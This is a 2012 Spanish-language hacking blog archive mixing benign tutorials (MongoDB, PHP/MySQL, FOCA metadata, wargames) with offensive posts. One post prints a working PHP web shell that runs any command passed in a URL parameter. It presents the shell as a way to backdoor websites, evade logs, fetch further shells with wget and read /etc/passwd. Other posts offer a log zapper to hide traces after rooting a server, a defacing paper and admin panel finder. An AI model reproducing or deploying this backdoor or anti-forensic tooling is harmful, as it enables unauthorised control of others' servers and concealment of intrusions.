2012 ~ Okol

domingo, 23 de diciembre de 2012

20:16 Unknown

AdminPanel Finder [PHP]

Hola amigos.
Espero estén bien comparto esta herramienta que programé hace un rato.
se trata de un admin panel finder; tiene pocos paneles, pero le podrán ir añadiendo como vallan sabiendo de más y asi mejorandola!

Espero les guste.

Código
Si se cae publiquenlo aquí y vuelvo a subir.
Saludos

jueves, 20 de diciembre de 2012

4:51 Sanko

Analisis de Metadatos con FOCA

Buenas! , en esta ocasión vengo a traerles una presentación.odp sobre Analisis de Metadatos con FOCA y como burlar FOCA.

Me toco realizar una charla sobre Analisis de Metadatos y use esta presentación como guia para realizar una demostración en directo sobre "Ataque y Defensa".

La presentación esta hecha a prueba de Kiddies por lo qué cualquiera pueda aprender.
Esta se hizo con la intención de hacerme de GUIA mientras iva explicando y haciendo las cosas por lo que su explicación sobre el uso de FOCA no es muy extensa pero servirá para aprender lo básico o para aquel que quiera realizar una charla sobre lo mismo pueda tomarla como guia para la suya.

Sin mas os dejo el link de descarga :
http://www.mediafire.com/?vyrxm1nomrm51hm

Espero que os sirva , un abrazo.
Sanko.

martes, 18 de diciembre de 2012

6:16 Sanko

MongoDB - La Mysql del NoSQL

Buenas , no hace mucho me hicierón una propuesta para trabajar como backend y requerian de conocimientos en bases de datos NoSQL, así que como buen autodidacta me puse a googlear y me encontre con la MySQL de las bases de datos no relacionales.

Esta se llamaba MongoDB y con tan solo leer sus características me dejo totalmente enamorado.

Índice :

    {1} Introducción:
        1-¿Qué es MongoDB?
        2-Características
        3-Instalando MongoDB y Primeros pasos

{1}.1 : ¿Qué es MongoDB?

A estas alturas y con esa introducción todos los que desconoceís de MongoDB os estareís preguntando

-¿Qué es MongoDB?- , ahora aclararé todo.

MongoDB es una base de datos relativamente "nueva", esta se orienta a documentos...

-¿Como a documentos?- , para poder trabajar cómodamente sobre mongoDB debemos de olvidarnos de la lógica relacional que MySQL nos implemento , así que realizaré una comparativa para que os quedeís con los términos básicos.

Términos SQL - Términos MongoDB :

Database - Database
Tabla - Colección
Fila - Documento(BSON)
columna - campo
index - index

Con esto ya tendremos una comparativa bastante clara y podemos proseguir con "¿Qué es MongoDB?".

MongoDB fue programada en C++ de código abierto y fué pensada para ser rápida , escalable y sencilla.

Es muy importante destacar que MongoDB ofrece un mayor rendimiento que CouchDB(otra BD NoSQL) e incluso que MySQL.

¿Para qué podemos usar MongoDB?

Puesto que MongoDB no usa digamos los "estándares" de bases de datos no es muy recomendable usarla para aplicaciones bancarias pero cuando tienes que almacenar grandes cantidades de datos como por ejemplo un blog si sería ideal.

Tambien mucha gente recomienda crear híbridos en los que uses una BD Relacional para las transacciones y una no relacional como MongoDB para guardar datos,documentos.

{1}.2 : Características de MongoDB :

Bueno vamos a ver un poco por encima las características de MongoDB :

Ausencia de transacciones
Utiliza Almacenamiento Orientado a documentos (BSON)
Soporte a Querys dinámicas
Indexación de Documentos
Indices Geoespaciales
Analisis de Rendimiento de Queries
Actualización de la información “in-Place”
GridFS
Replicación de Datos
Implementación de Auto Sharding
Utilización de Funciones Map/reduce

Ausencia de transacciones

Se tiene en cuenta como desventaja pero es por esto por lo que MongoDB puede ser más rápida y escalable.

Utiliza Almacenamiento Orientado a documentos (BSON)

BSON(Binary-JSON) es una excelente forma de intercambio de información y de almacenaje. MongoDB almacena todo en un mismo documento y gracias a json el cual describe el contenido del documento no existe la necesidad de crear estructuras ni de esquematizar.

Aparte de las funcionalidades que posee JSON agrega otras como la habilidad de manejar datos binarios, permitiendoles ser sumamente rápida en la búsqueda, indexación, almacenamiento y recuperación de la información, ya que BSON es fácil y rápidamente transformable en cualquier tipo de dato nativo de cualquier lenguaje de programación.

Soporte a Querys dinámicas

MongoDB acepta la ejecución de queries dinámicas, es decir , se pueden ejecutar consultas sin haberlas definido antes como pasa en CouchDB.

Indexación de Documentos

A la hora de insertar documentos a una colección se indexan con una clave/prefijo (_id) que proporciona al documento la capacidad de ser único, esta _id se puede definir a la hroa de insertar pero si no se define el propio mongo te pondrá una por defecto.

Indices Geoespaciales

Esto permite por indexar información basandonos en geo/localización lo que es muy útil a la hora de elaborar aplicaciones para este area.

Analisis de Rendimiento de Queries

MongoDB nos acerca una herramienta para analizar consultas, desde luego muy útil para analizar defectos o mejorarlas.

Actualización de la información “in-Place”

MongoDB puede actualizarse donde quiera que sucedan los cambios ya que realiza la escritura de la información en la memoría y retrasa la escritura en disco lo más posible (esto puede ser una desventaja) pero esto le proporciona su velocidad.

GridFS

Como ya comentamos mongo utiliza BSON para el almacenaje de datos binarios y su limite esta en 4MB de datos binarios en un mismo documento.

Para eso si necesitamos espacios adicionales para audios , videos , imagenes mongoDB nos acerca un sistema de almacenaje de metadatos, GridFS.

Este permite almacenar información del archivo en una coleccion de archivos.

Esto se divide en minimas partes(chunks) que se almacenan en una coleccion de chunks y permite que sea mas sencillo manejar y escalar.

Replicación de Datos

MongoDB tiene un mecanísmo llamado "replicación maestro-esclavo".

Este mecanismo es sencillo de entender , todas las peticiones de escritura se realizan en la BD maestra quien las "copia" en su réplica(esclavo) y así tenemos alternativa si la maestro falla porque la esclava ocupa su sitio.

Implementación de Auto Sharding

Esta es la característica más útilizada porque esta busca que se encarga del manejo de la data y de que esta vaya al servidor correcto para que las queries se ejecuten de la forma más eficiente.

Funciones Map/reduce

Son las funciones más poderosas en cuanto a consultoría de data se refiere.
Estan en JS(JavaScript) y se ejecutan en el servidor.
Hay que dejar claro que mongoDB tiene una shell js para el manejo de BD's y en ella podemos trabajar con código js que nos permite explotar todo su potencial.
(Bucles para insertar documentos etc etc...)

La función MAP se encarga de encontrar documentos que cumplen X condición/criterio , despues la funcion REDUCE se encarga de procesar esa información y nos retorna un documento con la información "peticionada"/"encargada".

{1}.3 : Instalando MongoDB

Es de lógica que si vamos a ver como instalar MongoDB primero habrá que descargarlo ¿No?.

Para esto acudimos a su website oficial ->Mongodb.org

Ahí podeís elejir para que OS y estas cositas , en mi caso Linux 32-bit

O tambien podemos hacerlo desde nuestra terminal :

sudo apt-get install mongodb

Para comprobar si todo quedo bien abrimos nuestra terminal y escribimos :

Se nos conecta a una bd por defecto "test" , vamos a crear nuestra propia database:

use nombredb

Podemos ver que databases tenemos creadas con :

show dbs

Aclaración :

La base de datos no se guardará hasta que no guardemos algo dentro...

esto quiere decir que si la creo "use namedb" y luego me salgo de la shell la db no aparecera como creada.

Ok , creemos una colección para nuestra database e insertaremos un documento :

db.nombrecoleccion #asi creamos la coleccion
db.nombrecoleccion.insert({"name":"sanko","twitter":"sankoSK"})

Podemos ver que colecciones tenemos creadas con :

show collections

Ahora usaremos .find() para comprobar que se creo el documento :

db.nombrecoleccion.find()

ahí vemos que nos creo el documento y lo pudimos buscar con .find() que daría un busqueda a todos entre los () podemos dar argumentos

Vamos a crear otro documento con una estructura totalmente diferente para probar la eficiencie de find() para pedirle una busqueda más especifica:

db.nombrecoleccion.insert({"color":"azul","material":"metal"})

db.nombrecoleccion.find({"color":"azul"})

Ahi comprobamos que nos muestra solo lo que nosotros queremos buscar , es decir , datos que contengan "color":"azul" , si no , no muestra nada.

Existe otro método , para mi un poco inútil la verdad pero es otro , xd , este muestra solo la primera fila del doc.

db.nombrecoleccion.findOne()

Bueno pasemos a el método count() , este si es más útil ya que nos dice el número de los que tenemos almacenados :

db.nombrecoleccion.count()

supongamos que queremos actualizar datos y para esto tenemos a nuestro querido update()

db.nombrecoleccion.update({"name":"sanko"}, {$set:{"other":"fuckthishit"}})

Como podeís observar en la imagen gracias a $set actualizamos el documento COLOCANDO "other":"fuckthishit" despues de "name":"sanko"

Ahora tocaremos sobre los métodos remove y drop , es de suponer que algo tiene que ver con eliminar... xd, el método remove nos servira para eliminar filas en los documentos , aqui un ejemplo :

db.nombrecoleccion.remove()

Esto lo que hará será borrar todas las filas del documento dejando este vacío:

pero tambien podemos usar a remove() con parametros para borrar algo de manera concreta :

db.nombrecoleccion.insert({"name":"sanko"})

db.nombrecoleccion.insert({"color":"rojo"})

db.nombrecoleccion.remove({"color":"rojo"})

ahí podeís ver que nos borro lo que le pedimos.

Bueno y por último en esta "introducción" a mongoDB daremos el método drop qué es como el remove PERO drop no tiene la opción de poder borrar datos especificos , si no que te vacia el documento y ya.

db.nombrecoleccion.drop()

Espero que vuestra opinión acerca de esta database sea buena y qué más que decir que el próximo articulo sobre mongodb será algo más "profundo" , veremos más métodos , de autentificación, y demas

Saludos , Sanko.

lunes, 17 de diciembre de 2012

11:49 Unknown

Exploits privados de 1337day.com

  ____       _            _         _____            _       _ _       
 |  _ \ _ __(_)_   ____ _| |_ ___  | ____|_  ___ __ | | ___ (_) |_ ___ 
 | |_) | '__| \ \ / / _` | __/ _ \ |  _| \ \/ / '_ \| |/ _ \| | __/ __|
 |  __/| |  | |\ V / (_| | |_  __/ | |___ >  <| |_) | | (_) | | |_\__ \
 |_|   |_|  |_| \_/ \__,_|\__\___| |_____/_/\_\ .__/|_|\___/|_|\__|___/

miércoles, 12 de diciembre de 2012

17:48 Unknown

Wargame RCE

Hola amigos.
esta tarde tenia un poc de tiempo así que me puse a programar un reto de RCE.

Objetivo: El objetivo es lograr ejecutar un comando en el servidor (Linux) ¿Qué comando?
No se puede decir que comando ya que si lo digo seria demaciado facil.

Pista: Tiene que ver con el procesador.

Link de el wargame

Publicar sus respuestas.
Saludos.

jueves, 29 de noviembre de 2012

15:16 Unknown

Wargame XSS

Hola amigos.
Tiempo sin programar algún wargame, Bien este consiste en lograr sacar una alerta (El XSS esta simulado).
pero cuando logres el vector correcto te dirá que pasaste la prueba así que... ¡SUERTE!

Link

Publiquen sus fotos aquí en la entrada.
Saludos.

sábado, 24 de noviembre de 2012

10:44 Unknown

Creando un minibackdoor en PHP

Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:

<form method="GET" action="lol.php">
<input type="text" name="comando">
<input type="submit" value="ejecutar">

<?php

if(isset($_GET['comando']));
{
$lol = @system($_GET['comando']);

echo $lol;
}

En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:

Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.

En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.

Otra cosa que podemos hacer es poner
$lol = @system($_GET['comando']);
en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria servidor.com/index.php?comando=cat+%2Fetc%2Fpasswd

y ejecutaria lo que es el comando.

Espero que les haya gustado.
Un saludo.

domingo, 11 de noviembre de 2012

11:42 Unknown

Wargame: Consigue el etc/passwd con LFI

Hola amigos.
hace mucho no creo un wargame y pues bueno les dejo este:
Consiste en poner en el formulario de texto los directorios a subir para logar sacar el LFI (Es una simulacion)
Cuando saquen el LFI les satara una alerta diciendo que has pasado el wargame)
Debes tomar foto a esa alerta y publicarla en esta entrada ó en el post correspondiente de underc0de (Ver post)
Espero les guste.

Link del wargame

Saludos.

martes, 6 de noviembre de 2012

18:33 Unknown

Entrevista a Moften.

Estamos con @Moften. Programador, Developer, Pentester, auditor, Entre otras muchas cosas.
Nos hablara sobre sus mas grandes experiencias y proyectos.

lunes, 29 de octubre de 2012

16:57 Unknown

Generador de index basicos HTML By Okol

Hola amigos espero tengan buena tarde. Hace rato me puse a programar un generador de index en html (Esta basico aún) Espero les guste. Acepto criticas reportes de fallos & Ideas que me propongan para agregarle Sin mas que decir les dejo el Url Para que descarguen el Source:
[100% By Okol]
Descargar!

Saludos!
Okol

domingo, 28 de octubre de 2012

19:03 Unknown

Guardar información en una Database con PHP By Okol

Hola amigos, les explicare como guardar la información en una DB Mysql con PHP.
Bien comenzamos.
Ya sabemos conectarnos a nuestro servidor y seleccionar la Base de datos a la que enviaremos información.
Ahora para guardar datos.
Usaremos "INSERT INTO"
¿Como?
Bueno, ya tenemos creada nuestra DB y nuestra tabla tambien, ya estamos conectados a el servidor y tenemos la base de datos seleccionada.

17:30 Unknown

Zapper Para Borrar logs [Perl]

Hola amigos, Les vengo a dejar esta tool que tenia guardada por ahí y bueno se trata de un Zapper
¿Para Qué Sirve?
Bueno sirve para borrar los logs un ejemplo puede ser cuando rooteamos un servidor para evitar dejar rastro usa un zapper.

Codigo:

12:02 Unknown

Underc0de Mailer By Okol.

¡Hola amigos!
Les traigo un mailer que me puse a practicar con el. No es un mailer PRO (ya que lo cree en 10 minutos)
Solo para probar.
Les dejo el código de fuente...

sábado, 27 de octubre de 2012

21:31 Unknown

Conectando con servidor Mysql y seleccionando una DB con PHP

Hola, bueno soy Okol , Bueno para empezar a postear algo sobre programación [PHP], Es un tema que muchos me han pedido y bueno empezemos:
Explicare como Conectarnos a un servidor y como seleccionar la base de datos para almacenar los mismos!
Empezamos:

¿Que servidor usaremos?

Yo usare localhost (En mi caso es Appserv) Pero pueden usar otros como xampp Bueno Después procederemos a Poner nuestra conección a el servidor así:

<?PHP

$con=mysql_connect("Servidor","Usuario de el servidor","password")or die(mysql_error());//Conectando a el Servidor
/* En xampp user es root y no tiene password
?>

//La funcion or die(mysql_error()) Significa decir: Dime el error que tengo

//La funcion mysql_connect(“”,”",”") Dice: Conectate a este servidor por este usuario y por esta contraseña, Asi estamos conectados al servidor

Ok ya tenemos conectado al servidor
Ahora pasaremos a Seleccionar la base de datos con una linea asi:

mysql_select_db('nombredb', $con);//Seleccionamos la Base de datos

Bueno Pronto hare un tutorial sobre como almacenar datos en la DB Mientras tanto les recomiendo practicar
Saludos
By Okol

21:25 Unknown

Paper Defacing By Okol

Hola amigos, vengo enseñándoles un paper que creé hace tiempo.
Se trata de defacing (Basico).
Incluye los temas:

Rfi (REMOTE FILE INCLUSION)

Lfi ( LOCAL FILE INCLUSION)

Xss (CrosS Site Scripting)

Symlink con la tool (EN PHP )

Autor: Okol

Descarga!

18:50 Unknown

Bienvenidos.

Hola amigos soy Okol. Usaré esta dirección de blogger.
Este proyecto nació hace algunos 2 meses, Pero nunca le había puesto atención. Ahora que ya estoy disponible para publicar entradas muy seguido y poder enseñar a los que siguen este blog.
A todos los lectores déjenme decirles GRACIAS.
¿Por Qué?
Por dedicar su tiempo leyendo mis entradas que con mucho gusto estaré publicando para todos y cada uno de ustedes.
Dejare mis datos en esta entrada por cualquier cosa que necesiten díganmelo con TODA Confianza y así todos tenemos una buena estancia en este blog.

[*]Skype: Okol-labs
[*]Twitter: @OkolTutos
[*]Msn: Okoltutos@hotmail.com
[*]Facebook: http://facebook.com/iiOkol

Gracias a Underc0de | 0byt3s | Xt3mp | Antrax

Eso es todo.
Espero disfruten las entradas.
Un Saludo.

domingo, 23 de diciembre de 2012

jueves, 20 de diciembre de 2012

martes, 18 de diciembre de 2012

lunes, 17 de diciembre de 2012

miércoles, 12 de diciembre de 2012

jueves, 29 de noviembre de 2012

sábado, 24 de noviembre de 2012

domingo, 11 de noviembre de 2012

martes, 6 de noviembre de 2012

lunes, 29 de octubre de 2012

domingo, 28 de octubre de 2012

sábado, 27 de octubre de 2012

Popular Posts

Comprar el blog

Labels

Blog Archive

Recomendados

Visitas

Escritores

Okol

Seguidores